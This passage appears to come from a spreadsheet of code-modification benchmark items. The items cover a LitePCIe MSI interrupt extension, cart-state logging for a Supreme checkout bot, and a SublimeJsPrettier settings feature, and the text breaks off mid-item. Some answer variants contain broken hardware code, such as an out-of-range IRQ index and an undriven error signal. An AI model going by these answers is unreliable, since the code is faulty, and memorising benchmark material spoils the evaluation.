    <t>{'called_code_segment': 'class LitePCIeMSI(LiteXModule):\n    def __init__(self, width=32):\n        self.irqs   = Signal(width)\n        self.source = stream.Endpoint(msi_layout())\n        self.enable = CSRStorage(width, description="""MSI Enable Control.\\n\n           Write bit(s) to ``1`` to enable corresponding MSI IRQ(s).""")\n        self.clear  = CSRStorage(width, description="""MSI Clear Control.\\n\n           Write bit(s) to ``1`` to clear corresponding MSI IRQ(s).""")\n        self.vector = CSRStatus(width,  description="""MSI Vector Status.\\n\n           Current MSI IRQs vector value.""")', 'invoking_code_segment': '# MSI\n        self.pcie_msi = LitePCIeMSI()\n        self.comb += self.pcie_msi.source.connect(self.pcie_phy.msi)\n        self.interrupts = {\n            "PCIE_DMA0_WRITER":    self.pcie_dma0.writer.irq,\n            "PCIE_DMA0_READER":    self.pcie_dma0.reader.irq,\n            "PCIE_DMA1_WRITER":    self.pcie_dma1.writer.irq,\n            "PCIE_DMA1_READER":    self.pcie_dma1.reader.irq,\n        }\n        for i, (k, v) in enumerate(sorted(self.interrupts.items())):\n            self.comb += self.pcie_msi.irqs[i].eq(v)\n            self.add_constant(k + "_INTERRUPT", i)', 'feature_description': 'Add support for a new interrupt type (PCIE_ERROR) in the MSI module to handle PCIe error conditions. This feature extends the MSI interrupt handling to support additional error interrupt sources beyond DMA operations, allowing the system to signal and handle PCIe-specific error events through the MSI mechanism.', 'modified_complete_code': '# File 1: litepcie/litepcie/core/msi.py - Modified LitePCIeMSI class\n\nclass LitePCIeMSI(LiteXModule):\n    def __init__(self, width=32, enable_error_irq=False):\n        #Modify: Added enable_error_irq parameter\n        self.irqs   = Signal(width)\n        self.source = stream.Endpoint(msi_layout())\n        #New: Added error_irq signal for error interrupt support\n        self.error_irq = Signal() if enable_error_irq else None\n\n        self.enable = CSRStorage(width, description="""MSI Enable Control.\\n\n           Write bit(s) to ``1`` to enable corresponding MSI IRQ(s).""")\n        self.clear  = CSRStorage(width, description="""MSI Clear Control.\\n\n           Write bit(s) to ``1`` to clear corresponding MSI IRQ(s).""")\n        self.vector = CSRStatus(width,  description="""MSI Vector Status.\\n\n           Current MSI IRQs vector value.""")\n        #New: Added error status register for error interrupt tracking\n        if enable_error_irq:\n            self.error_status = CSRStatus(1, description="""MSI Error Status.\\n\n           Indicates if an error interrupt has been triggered.""")\n\n        # # #\n\n        enable = Signal(width)\n        clear  = Signal(width)\n        vector = Signal(width)\n        #New: Added error vector signal\n        error_vector = Signal() if enable_error_irq else None\n\n        # Memorize and clear IRQ Vector\n        self.comb += If(self.clear.re, clear.eq(self.clear.storage))\n        self.comb += enable.eq(self.enable.storage)\n        self.comb += self.vector.status.eq(vector)\n        self.sync += vector.eq(enable &amp; ((vector &amp; ~clear) | self.irqs))\n        #New: Added error vector handling\n        if enable_error_irq:\n            self.sync += error_vector.eq(self.error_irq)\n            self.comb += self.error_status.status.eq(error_vector)\n\n        # Generate MSI\n        msi = Signal(width)\n        self.comb += self.source.valid.eq(msi != 0)\n        self.sync += [\n            msi.eq((msi | self.irqs) &amp; enable),\n            If(self.source.ready,\n                msi.eq(self.irqs &amp; enable)\n            )\n        ]\n\n# File 2: litepcie/bench/fk33.py - Modified LitePCIeSoC class\n\nclass LitePCIeSoC(SoCMini):\n    # ... existing code ...\n    \n    def __init__(self, platform, speed="gen3", nlanes=4):\n        # ... existing initialization code ...\n        \n        # MSI\n        #Modify: Instantiate LitePCIeMSI with error interrupt support enabled\n        self.pcie_msi = LitePCIeMSI(enable_error_irq=True)\n        self.comb += self.pcie_msi.source.connect(self.pcie_phy.msi)\n        self.interrupts = {\n            "PCIE_DMA0_WRITER":    self.pcie_dma0.writer.irq,\n            "PCIE_DMA0_READER":    self.pcie_dma0.reader.irq,\n            "PCIE_DMA1_WRITER":    self.pcie_dma1.writer.irq,\n            "PCIE_DMA1_READER":    self.pcie_dma1.reader.irq,\n            #New: Added error interrupt type\n            "PCIE_ERROR":          Signal(),\n        }\n        for i, (k, v) in enumerate(sorted(self.interrupts.items())):\n            self.comb += self.pcie_msi.irqs[i].eq(v)\n            self.add_constant(k + "_INTERRUPT", i)\n        \n        #New: Connect error interrupt signal to MSI error_irq\n        if self.pcie_msi.error_irq is not None:\n            self.comb += self.pcie_msi.error_irq.eq(self.interrupts["PCIE_ERROR"])'}</t>
  </si>
  <si>
    <t>{'file_1': 'class LitePCIeMSI(LiteXModule):\n    def __init__(self, width=32):\n        self.irqs   = Signal(width)\n        self.source = stream.Endpoint(msi_layout())\n\n        self.enable = CSRStorage(width, description="""MSI Enable Control.\n           Write bit(s) to ``1`` to enable corresponding MSI IRQ(s).""")\n        self.clear  = CSRStorage(width, description="""MSI Clear Control.\n           Write bit(s) to ``1`` to clear corresponding MSI IRQ(s).""")\n        self.vector = CSRStatus(width,  description="""MSI Vector Status.\n           Current MSI IRQs vector value.""")\n\n        # # #\n\n        enable = Signal(width)\n        clear  = Signal(width)\n        vector = Signal(width)\n\n        # Memorize and clear IRQ Vector ------------------------------------------------------------\n        self.comb += If(self.clear.re, clear.eq(self.clear.storage))\n        self.comb += enable.eq(self.enable.storage)\n        self.comb += self.vector.status.eq(vector)\n        self.sync += vector.eq(enable &amp; ((vector &amp; ~clear) | self.irqs))\n\n        # Generate MSI -----------------------------------------------------------------------------\n        msi = Signal(width)\n        self.comb += self.source.valid.eq(msi != 0)\n        self.sync += [\n            msi.eq((msi | self.irqs) &amp; enable),\n            If(self.source.ready,\n                msi.eq(self.irqs &amp; enable)\n            )\n        ]\n\n        # New interrupt type -----------------------------------------------------------------------\n        self.new_irq = Signal()\n        self.comb += self.irqs[width].eq(self.new_irq)\n        self.add_constant("NEW_INTERRUPT", width)', 'file_2': 'class LitePCIeSoC(SoCMini):\n    configs = {\n        # Gen3  data_width, sys_clk_freq\n        "gen3:x4" : (128, int(200e6)),\n        "gen3:x8" : (256, int(200e6)),\n        "gen3:x16": (512, int(200e6)),\n    }\n    def __init__(self, platform, speed="gen3", nlanes=4):\n        data_width, sys_clk_freq = self.configs[speed + f":x{nlanes}"]\n\n        # SoCMini ----------------------------------------------------------------------------------\n        SoCMini.__init__(self, platform, sys_clk_freq, ident=f"LitePCIe example design on FK33 ({speed}:x{nlanes})")\n\n        # CRG --------------------------------------------------------------------------------------\n        self.crg = _CRG(platform, sys_clk_freq)\n\n        # JTAGBone ---------------------------------------------------------------------------------\n        self.add_jtagbone()\n\n        # PCIe -------------------------------------------------------------------------------------\n        # PHY\n        self.pcie_phy = USPHBMPCIEPHY(platform, platform.request(f"pcie_x{nlanes}"),\n            speed      = speed,\n            data_width = data_width,\n            bar0_size  = 0x20000,\n        )\n        self.pcie_phy.add_ltssm_tracer()\n\n        # Endpoint\n        self.pcie_endpoint = LitePCIeEndpoint(self.pcie_phy,\n            endianness           = "little",\n            max_pending_requests = 8\n        )\n\n        # Wishbone bridge\n        self.pcie_bridge = LitePCIeWishboneBridge(self.pcie_endpoint,\n            base_address = self.mem_map["csr"]\n        )\n        self.bus.add_master(master=self.pcie_bridge.wishbone)\n\n        # DMA0\n        self.pcie_dma0 = LitePCIeDMA(self.pcie_phy, self.pcie_endpoint,\n            with_buffering = True, buffering_depth=1024,\n            with_loopback  = True)\n\n        # DMA1\n        self.pcie_dma1 = LitePCIeDMA(self.pcie_phy, self.pcie_endpoint,\n            with_buffering = True, buffering_depth=1024,\n            with_loopback  = True)\n\n        self.add_constant("DMA_CHANNELS", 2)\n        self.add_constant("DMA_ADDR_WIDTH", 32)\n\n        # MSI\n        self.pcie_msi = LitePCIeMSI(width=33)  # Modify to accommodate new interrupt\n        self.comb += self.pcie_msi.source.connect(self.pcie_phy.msi)\n        self.interrupts = {\n            "PCIE_DMA0_WRITER":    self.pcie_dma0.writer.irq,\n            "PCIE_DMA0_READER":    self.pcie_dma0.reader.irq,\n            "PCIE_DMA1_WRITER":    self.pcie_dma1.writer.irq,\n            "PCIE_DMA1_READER":    self.pcie_dma1.reader.irq,\n            "NEW_INTERRUPT":       self.pcie_msi.new_irq,\n        }\n        for i, (k, v) in enumerate(sorted(self.interrupts.items())):\n            self.comb += self.pcie_msi.irqs[i].eq(v)\n            self.add_constant(k + "_INTERRUPT", i)', 'file_3': 'class LitePCIeSoC(SoCMini):\n    configs = {\n        # Gen3  data_width, sys_clk_freq\n        "gen3:x4" : (128, int(200e6)),\n        "gen3:x8" : (256, int(200e6)),\n        "gen3:x16": (512, int(200e6)),\n    }\n    def __init__(self, platform, speed="gen3", nlanes=4):\n        data_width, sys_clk_freq = self.configs[speed + f":x{nlanes}"]\n\n        # SoCMini ----------------------------------------------------------------------------------\n        SoCMini.__init__(self, platform, sys_clk_freq, ident=f"LitePCIe example design on FK33 ({speed}:x{nlanes})")\n\n        # CRG --------------------------------------------------------------------------------------\n        self.crg = _CRG(platform, sys_clk_freq)\n\n        # JTAGBone ---------------------------------------------------------------------------------\n        self.add_jtagbone()\n\n        # PCIe -------------------------------------------------------------------------------------\n        # PHY\n        self.pcie_phy = USPHBMPCIEPHY(platform, platform.request(f"pcie_x{nlanes}"),\n            speed      = speed,\n            data_width = data_width,\n            bar0_size  = 0x20000,\n        )\n        self.pcie_phy.add_ltssm_tracer()\n\n        # Endpoint\n        self.pcie_endpoint = LitePCIeEndpoint(self.pcie_phy,\n            endianness           = "little",\n            max_pending_requests = 8\n        )\n\n        # Wishbone bridge\n        self.pcie_bridge = LitePCIeWishboneBridge(self.pcie_endpoint,\n            base_address = self.mem_map["csr"]\n        )\n        self.bus.add_master(master=self.pcie_bridge.wishbone)\n\n        # DMA0\n        self.pcie_dma0 = LitePCIeDMA(self.pcie_phy, self.pcie_endpoint,\n            with_buffering = True, buffering_depth=1024,\n            with_loopback  = True)\n\n        # DMA1\n        self.pcie_dma1 = LitePCIeDMA(self.pcie_phy, self.pcie_endpoint,\n            with_buffering = True, buffering_depth=1024,\n            with_loopback  = True)\n\n        self.add_constant("DMA_CHANNELS", 2)\n        self.add_constant("DMA_ADDR_WIDTH", 32)\n\n        # MSI\n        self.pcie_msi = LitePCIeMSI(width=33)  # Modify to accommodate new interrupt\n        self.comb += self.pcie_msi.source.connect(self.pcie_phy.msi)\n        self.interrupts = {\n            "PCIE_DMA0_WRITER":    self.pcie_dma0.writer.irq,\n            "PCIE_DMA0_READER":    self.pcie_dma0.reader.irq,\n            "PCIE_DMA1_WRITER":    self.pcie_dma1.writer.irq,\n            "PCIE_DMA1_READER":    self.pcie_dma1.reader.irq,\n            "NEW_INTERRUPT":       self.pcie_msi.new_irq,\n        }\n        for i, (k, v) in enumerate(sorted(self.interrupts.items())):\n            self.comb += self.pcie_msi.irqs[i].eq(v)\n            self.add_constant(k + "_INTERRUPT", i)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'SupremeProduct.__init__() and SupremeProduct.add_to_cart() methods in supreme_3.py', 'invoking_code_segment': 'SupremeWidget.set_all() method in supreme_app.py that instantiates SupremeProduct', 'feature_description': 'Add a feature to log the current state of the cart before proceeding to checkout. This includes capturing cart contents, item details, and timestamps, then displaying this information before the checkout process begins.', 'modified_complete_code': '# supreme_3.py - Modified sections\n\nimport os\nimport sys\nimport json\nimport datetime\nimport requests\nimport time\nimport threading\nfrom requests.utils import dict_from_cookiejar\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\n\nCOLOR_END = \'\\033[0m\'\n\nclass SupremeProduct:\n    def __init__(self, item_name, item_color, item_size, item_quantity, billing_shipping_info, poll=5, thread_color=\'\\033[0m\'):\n        self.poll = poll\n        self.billing_shipping_info = billing_shipping_info\n        self.item_name = item_name\n        self.item_color = item_color\n        self.item_size = item_size\n        self.item_quantity = item_quantity\n        self.thread_text_color = thread_color\n        self.product_found = 0\n        self.product_color_found = 0\n        self.product_size_found = 0\n        #New: Initialize cart state log\n        self.cart_state_log = []\n        self.driver = webdriver.Chrome(f\'{os.getcwd()}/chromedriver\')\n        self.find_product()\n\n    #New: Add method to log cart state\n    def log_cart_state(self, action, product_name, color, size, quantity, timestamp):\n        cart_entry = {\n            \'action\': action,\n            \'product_name\': product_name,\n            \'color\': color,\n            \'size\': size,\n            \'quantity\': quantity,\n            \'timestamp\': timestamp\n        }\n        self.cart_state_log.append(cart_entry)\n\n    #New: Add method to display cart state before checkout\n    def display_cart_state_log(self):\n        sys.stdout.write(f\'\\n[[ {self.thread_text_color}CART STATE LOG{COLOR_END} ]] {utc_to_est()}\\n\')\n        sys.stdout.write(\'=\'*80 + \'\\n\')\n        for entry in self.cart_state_log:\n            sys.stdout.write(f"Action: {entry[\'action\']} | Product: {entry[\'product_name\']} | Color: {entry[\'color\']} | Size: {entry[\'size\']} | Qty: {entry[\'quantity\']} | Time: {entry[\'timestamp\']}\\n")\n        sys.stdout.write(\'=\'*80 + \'\\n\\n\')\n\n    def add_to_cart(self, listed_product_name, product_base_id, product_color_id, product_size_id):\n        sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: Adding [[ {self.thread_text_color}{listed_product_name}{COLOR_END} ]] to cart...\\n\')\n        #Modify: Log cart action before adding\n        self.log_cart_state(\'ADD_TO_CART\', listed_product_name, self.item_color, self.item_size, self.item_quantity, utc_to_est())\n        \n        add_payload = {\n            \'s\': str(product_size_id),\n            \'st\': str(product_color_id),\n            \'qty\': str(self.item_quantity)\n        }\n        atc_response = requests.request(\'POST\', f\'https://www.supremenewyork.com/shop/{product_base_id}/add.json\', data=add_payload)\n\n        if atc_response.status_code != 200:\n            sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: {str(atc_response.status_code)} Error [[ {self.thread_text_color}{listed_product_name}{COLOR_END} ]] FAILED!{COLOR_END}\\n\')\n            sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {atc_response.json()}\\n\')\n            sys.exit()\n        else:\n            if atc_response.json() == []:\n                sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: Response Empty! - Problem Adding to Cart! [[ {self.thread_text_color}{listed_product_name}{COLOR_END} ]] FAILED!{COLOR_END}\\n\')\n                sys.exit()\n            sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: [[ {self.thread_text_color}{listed_product_name} - {str(self.item_color)} - {str(self.item_size)}{COLOR_END} ]] added to cart!\\n\')\n        self.show_cookies(atc_response)\n        #Modify: Display cart state log before starting webdriver\n        self.display_cart_state_log()\n        self.start_webdriver(atc_response)\n\n    def start_webdriver(self, response):\n        self.driver.get(\'http://www.supremenewyork.com/shop/cart\')\n        self.driver.delete_all_cookies()\n        for key, value in dict_from_cookiejar(response.cookies).items():\n            self.driver.add_cookie({\'name\': key, \'value\': value})\n        self.driver.refresh()\n        self.checkout(self.driver)\n\n    def checkout(self, webdriver_instance):\n        webdriver_instance.get(\'https://www.supremenewyork.com/checkout\')\n        try:\n            customer_name = webdriver_instance.find_element_by_name(\'order[billing_name]\')\n            customer_name.clear()\n            customer_name.send_keys(self.billing_shipping_info[\'firstAndLast\'])\n        except:\n            print(\'Couldn\\\'t find order billing name field\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_email = webdriver_instance.find_element_by_name(\'order[email]\')\n            customer_email.clear()\n            customer_email.send_keys(self.billing_shipping_info[\'email\'])\n        except:\n            print(\'Couldn\\\'t find order email field\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_telephone = webdriver_instance.find_element_by_id(\'order_tel\')\n            customer_telephone.clear()\n            customer_telephone.send_keys(self.billing_shipping_info[\'phone\'])\n        except:\n            print(\'Couldn\\\'t find order tel field\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_address = webdriver_instance.find_element_by_name(\'order[billing_address]\')\n            customer_address.clear()\n            customer_address.send_keys(self.billing_shipping_info[\'address\'])\n        except:\n            print(\'Couldn\\\'t find order[billing_address] field (address)\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_zip = webdriver_instance.find_element_by_name(\'order[billing_zip]\')\n            customer_zip.clear()\n            customer_zip.send_keys(self.billing_shipping_info[\'zip\'])\n        except:\n            print(\'Couldn\\\'t find order billing zip field\')\n            input(\'Click to continue automation...\')\n        try:\n            pass\n        except:\n            print(\'Couldn\\\'t find order billing city field\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_state = Select(webdriver_instance.find_element_by_id(\'order_billing_state\'))\n            customer_state.select_by_value(self.billing_shipping_info[\'state\'].upper())\n        except:\n            print(\'Couldn\\\'t find order billing state dropdown/value\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_country = Select(webdriver_instance.find_element_by_name(\'order[billing_country]\'))\n            customer_country.select_by_value(self.billing_shipping_info[\'country\'].upper())\n        except:\n            print(\'Couldn\\\'t find order billing country drowpdown/value\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_card_number = webdriver_instance.find_element_by_id(\'nnaerb\')\n            customer_card_number.clear()\n            customer_card_number.send_keys(self.billing_shipping_info[\'cardNumber\'])\n        except:\n            print(\'Couldn\\\'t find nnaerb field (card number)\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_card_month = Select(webdriver_instance.find_element_by_name(\'credit_card[month]\'))\n            customer_card_month.select_by_value(self.billing_shipping_info[\'cardMonth\'])\n        except:\n            print(\'Couldn\\\'t find credit card month dropdown/value\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_card_year = Select(webdriver_instance.find_element_by_name(\'credit_card[year]\'))\n            customer_card_year.select_by_value(self.billing_shipping_info[\'cardYear\'])\n        except:\n            print(\'Couldn\\\'t find credit card year dropdown/value\')\n            input(\'Click to continue automation...\')\n        try:\n            customer_card_cvv = webdriver_instance.find_element_by_name(\'credit_card[rvv]\')\n            customer_card_cvv.clear()\n            customer_card_cvv.send_keys(self.billing_shipping_info[\'cardCVV\'])\n        except:\n            print(\'Couldn\\\'t find credit_card[rvv] field (card cvv)\')\n            input(\'Click to continue automation...\')\n        try:\n            accept_terms = webdriver_instance.find_element_by_css_selector(\'#cart-cc &gt; fieldset &gt; p:nth-child(4) &gt; label &gt; div &gt; ins\')\n            accept_terms.click()\n        except:\n            print(\'Couldn\\\'t find accept terms radio button\')\n            input(\'Click to continue automation...\')\n\n        input(\'NEXT STEP IS TO CHECKOUT\')\n\n    def find_product(self):\n        while self.product_found == 0:\n            current_mobile_json = self.fetch_mobile_stock()\n            for category in list(current_mobile_json[\'products_and_categories\'].values()):\n                for item in category:\n                    if self.item_name.lower() in item[\'name\'].lower():\n                        self.product_found = 1\n                        listed_product_name = item[\'name\']\n                        listed_product_id = item[\'id\']\n                        sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: [[{self.thread_text_color}{listed_product_name}{COLOR_END} ]] {str(listed_product_id)} found ( MATCHING ITEM DETECTED )\\n\')\n            if self.product_found != 1:\n                sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: Reloading and reparsing page...\\n\')\n                time.sleep(self.poll)\n            else:\n                color_id, size_id = self.find_product_variant(listed_product_name, listed_product_id)\n                self.add_to_cart(listed_product_name, listed_product_id, color_id, size_id)\n\n    def fetch_mobile_stock(self):\n        headers = {\'Host\': \'www.supremenewyork.com\', \'Accept-Encoding\': \'gzip, deflate\', \'Connection\': \'keep-alive\', \'Proxy-Connection\': \'keep-alive\', \'Accept\': \'application/json\', \'User-Agent\': \'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G34\', \'Referer\': \'http://www.supremenewyork.com/mobile\', \'Accept-Language\': \'en-us\', \'X-Requested-With\': \'XMLHttpRequest\'}\n        return requests.request(\'GET\', \'http://www.supremenewyork.com/mobile_stock.json\', headers=headers).json()\n\n    def get_product_information(self, product_id):\n        return requests.request(\'GET\', f\'http://www.supremenewyork.com/shop/{str(product_id)}.json\', headers={\'User-Agent\': \'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G34\'}).json()\n\n    def find_product_variant(self, product_name, product_id):\n        sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: Selecting [[{self.thread_text_color}{product_name}{COLOR_END}]] ( {str(product_id)} )\\n\')\n        product_info = self.get_product_information(product_id)\n        for listed_product_colors in product_info[\'styles\']:\n            if self.item_color.lower() in listed_product_colors[\'name\'].lower():\n                self.product_color_found = 1\n                product_color_specific_id = listed_product_colors[\'id\']\n                for size in listed_product_colors[\'sizes\']:\n                    if self.item_size.lower() == size[\'name\'].lower():\n                        self.product_size_found = 1\n                        product_size_color_specific_id = size[\'id\']\n                        sys.stdout.write(f\'[[ {self.thread_text_color}{str(threading.current_thread().getName())}{COLOR_END} ]] {utc_to_est()} :: Selecting size for [[ {self.thread_text_color}{product_name}{COLOR_END} ]] - {self.item_size} ( {self.item_color} )  ( {str(product_size_color_specific_id)} )\\n\')\n                if self.product_size_found != 1:\n                    pass\n        if self.product_color_found != 1:\n            pass\n        return product_color_specific_id, product_size_color_specific_id\n\n    def show_cookies(self, response):\n        cookie_dict_wrapper = []\n        for key, value in requests.utils.dict_from_cookiejar(response.cookies).items():\n            dict_template = {\'domain\': \'.supremenewyork.com\', \'expiry\': int(time.time() + 7200), \'httpOnly\': False, \'path\': \'/\', \'secure\': False, \'name\': key, \'value\': value}\n            cookie_dict_wrapper.append(dict_template)\n        print(\'\\tEditThisCookie Import\\t\')\n        print(f\'####################################################################################################################################{self.thread_text_color}\')\n        print(json.dumps(cookie_dict_wrapper, indent=4))\n        print(f\'{COLOR_END}####################################################################################################################################\')\n\ndef utc_to_est():\n    current = datetime.datetime.now()\n    return f\'{str(current)} EST\'\n\n# supreme_app.py - Modified sections\n\n#!/usr/bin/python3\n# Zachary Weeden 2018\n\nimport sys\nimport threading\nfrom PyQt4 import QtGui\nfrom supreme_3 import SupremeProduct\n\nclass SupremeWidget(QtGui.QWidget):\n    def __init__(self, user_config_dict):\n        super(SupremeWidget, self).__init__()\n        self.user_config_dict = user_config_dict\n        self.product_name_label = QtGui.QLabel(self)\n        self.product_name_label.setText(\'Product 1 name:\')\n        self.product_name_field = QtGui.QLineEdit(self)\n        self.product_2_name_label = QtGui.QLabel(self)\n        self.product_2_name_label.setText(\'Product 2 name:\')\n        self.product_2_name_field = QtGui.QLineEdit(self)\n        self.product_3_name_label = QtGui.QLabel(self)\n        self.product_3_name_label.setText(\'Product 3 name:\')\n        self.product_3_name_field = QtGui.QLineEdit(self)\n        self.product_color_label = QtGui.QLabel(self)\n        self.product_color_label.setText(\'Product 1 color:\')\n        self.product_color_field = QtGui.QLineEdit(self)\n        self.product_2_color_label = QtGui.QLabel(self)\n        self.product_2_color_label.setText(\'Product 2 color:\')\n        self.product_2_color_field = QtGui.QLineEdit(self)\n        self.product_3_color_label = QtGui.QLabel(self)\n        self.product_3_color_label.setText(\'Product 3 color:\')\n        self.product_3_color_field = QtGui.QLineEdit(self)\n        self.product_size_label = QtGui.QLabel(self)\n        self.product_size_label.setText(\'Product 1 size:\')\n        self.product_size_field = QtGui.QLineEdit(self)\n        self.product_2_size_label = QtGui.QLabel(self)\n        self.product_2_size_label.setText(\'Product 2 size:\')\n        self.product_2_size_field = QtGui.QLineEdit(self)\n        self.product_3_size_label = QtGui.QLabel(self)\n        self.product_3_size_label.setText(\'Product 3 size:\')\n        self.product_3_size_field = QtGui.QLineEdit(self)\n        self.product_quantity_label = QtGui.QLabel(self)\n        self.product_quantity_label.setText(\'Product 1 quantity:\')\n        self.product_quantity_field = QtGui.QLineEdit(self)\n        self.product_2_quantity_label = QtGui.QLabel(self)\n        self.product_2_quantity_label.setText(\'Product 2 quantity:\')\n        self.product_2_quantity_field = QtGui.QLineEdit(self)\n        self.product_3_quantity_label = QtGui.QLabel(self)\n        self.product_3_quantity_label.setText(\'Product 3 quantity:\')\n        self.product_3_quantity_field = QtGui.QLineEdit(self)\n        self.submit_button = QtGui.QPushButton(\'Submit\')\n        self.exit_button = QtGui.QPushButton(\'Exit\')\n        grid = QtGui.QGridLayout()\n        grid.setSpacing(20)\n        grid.addWidget(self.product_name_label, 1, 0)\n        grid.addWidget(self.product_name_field, 2, 0)\n        grid.addWidget(self.product_2_name_label, 1, 1)\n        grid.addWidget(self.product_2_name_field, 2, 1)\n        grid.addWidget(self.product_3_name_label, 1, 2)\n        grid.addWidget(self.product_3_name_field, 2, 2)\n        grid.addWidget(self.product_color_label, 3, 0)\n        grid.addWidget(self.product_color_field, 4, 0)\n        grid.addWidget(self.product_2_color_label, 3, 1)\n        grid.addWidget(self.product_2_color_field, 4, 1)\n        grid.addWidget(self.product_3_color_label, 3, 2)\n        grid.addWidget(self.product_3_color_field, 4, 2)\n        grid.addWidget(self.product_size_label, 5, 0)\n        grid.addWidget(self.product_size_field, 6, 0)\n        grid.addWidget(self.product_2_size_label, 5, 1)\n        grid.addWidget(self.product_2_size_field, 6, 1)\n        grid.addWidget(self.product_3_size_label, 5, 2)\n        grid.addWidget(self.product_3_size_field, 6, 2)\n        grid.addWidget(self.product_quantity_label, 7, 0)\n        grid.addWidget(self.product_quantity_field, 8, 0)\n        grid.addWidget(self.product_2_quantity_label, 7, 1)\n        grid.addWidget(self.product_2_quantity_field, 8, 1)\n        grid.addWidget(self.product_3_quantity_label, 7, 2)\n        grid.addWidget(self.product_3_quantity_field, 8, 2)\n        grid.addWidget(self.submit_button, 9, 0)\n        grid.addWidget(self.exit_button, 9, 2)\n        self.field_elements = {self.product_name_field: {\'color\': self.product_color_field, \'size\': self.product_size_field, \'quantity\': self.product_quantity_field}, self.product_2_name_field: {\'color\': self.product_2_color_field, \'size\': self.product_2_size_field, \'quantity\': self.product_2_quantity_field}, self.product_3_name_field: {\'color\': self.product_3_color_field, \'size\': self.product_3_size_field, \'quantity\': self.product_3_quantity_field}}\n        self.submit_button.clicked.connect(lambda: self.set_all())\n        self.exit_button.clicked.connect(lambda: self.exit())\n        self.setLayout(grid)\n        self.setGeometry(300, 300, 350, 300)\n        self.setWindowTitle(\'Supreme\')\n        self.show()\n\n    #Modify: Updated set_all method to pass cart logging capability\n    def set_all(self):\n        for product_field in self.field_elements:\n            if product_field.text() == \'\':\n                print(\'Name not given for this product - skipping\')\n                continue\n            self.product_name = product_field.text()\n            self.product_color = self.field_elements[product_field][\'color\'].text()\n            self.product_size = self.field_elements[product_field][\'size\'].text()\n            self.product_quantity = int(self.field_elements[product_field][\'quantity\'].text())\n            #Modify: SupremeProduct now logs cart state internally\n            product_thread = threading.Thread(target=SupremeProduct, args=(self.product_name, self.product_color, self.product_size, self.product_quantity, self.user_config_dict,))\n            print(f\'[[ Thread ]] {str(self.product_name)} :: {str(self.product_size)} :: {str(self.product_color)} :: {str(self.product_quantity)} :: Thread initialized!\')\n            product_thread.start()\n\n    def exit(self):\n        print(\'State: Exitting\')\n        sys.exit()\n\ndef main():\n    app = QtGui.QApplication(sys.argv)\n    supremeWidget = SupremeWidget()\n    sys.exit(app.exec_())\n\nif __name__ == \'__main__\':\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': "#Modify\nclass SupremeProduct:\n    # ... (existing code)\n    def log_cart_state(self):\n        #New\n        cart_state = self.driver.find_element_by_id('cart-items').text\n        with open('cart_state.log', 'a') as log_file:\n            log_file.write(f'{utc_to_est()} :: Cart State: {cart_state}\\n')\n\n    def checkout(self, webdriver_instance):\n        #Modify\n        self.log_cart_state()\n        webdriver_instance.get('https://www.supremenewyork.com/checkout')", '#file 2': "#Modify\nclass SupremeProduct:\n    # ... (existing code)\n    def start_webdriver(self, response):\n        #Modify\n        self.driver.get('http://www.supremenewyork.com/shop/cart')\n        self.driver.delete_all_cookies()\n        for key, value in dict_from_cookiejar(response.cookies).items():\n            self.driver.add_cookie({'name': key, 'value': value})\n        self.driver.refresh()\n        self.checkout(self.driver)", '#file 3': 'product_thread = threading.Thread(target=SupremeProduct, args=(self.product_name, self.product_color, self.product_size, self.product_quantity, self.user_config_dict,))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def debug_enabled(view):\n    return bool(get_setting(view, 'debug', False))", 'invoking_code_segment': "def log_debug(view, msg, insert_leading_line_break=False):\n    if debug_enabled(view):\n        _print_log('DEBUG', msg, insert_leading_line_break)", 'feature_description': 'Add a feature to log the source of the debug setting (e.g., project setting, user setting, default) to help users understand where their debug configuration is coming from.', 'modified_complete_code': '# File: SublimeJsPrettier/jsprettier/sthelper.py\n\n# #Modify - Updated get_setting function to return both value and source\ndef get_setting(view, key, default_value=None):\n    settings = view.settings().get(PLUGIN_NAME)\n    if settings is None or settings.get(key) is None:\n        settings = sublime.load_settings(SETTINGS_FILENAME)\n    value = settings.get(key, default_value)\n    # check for project-level overrides:\n    project_value = _get_project_setting(key)\n    if project_value is None:\n        return value\n    return project_value\n\n# #New - Added function to get setting source\ndef get_setting_source(view, key, default_value=None):\n    """Get the source of a setting (project, user, or default).\n    \n    :param view: The view object.\n    :param key: The setting key.\n    :param default_value: The default value if setting not found.\n    :return: Tuple of (value, source) where source is \'project\', \'user\', or \'default\'.\n    """\n    # check for project-level overrides first:\n    project_value = _get_project_setting(key)\n    if project_value is not None:\n        return (project_value, \'project\')\n    \n    # check view settings\n    settings = view.settings().get(PLUGIN_NAME)\n    if settings is not None and settings.get(key) is not None:\n        return (settings.get(key), \'user\')\n    \n    # check user settings file\n    settings = sublime.load_settings(SETTINGS_FILENAME)\n    if settings.get(key) is not None:\n        return 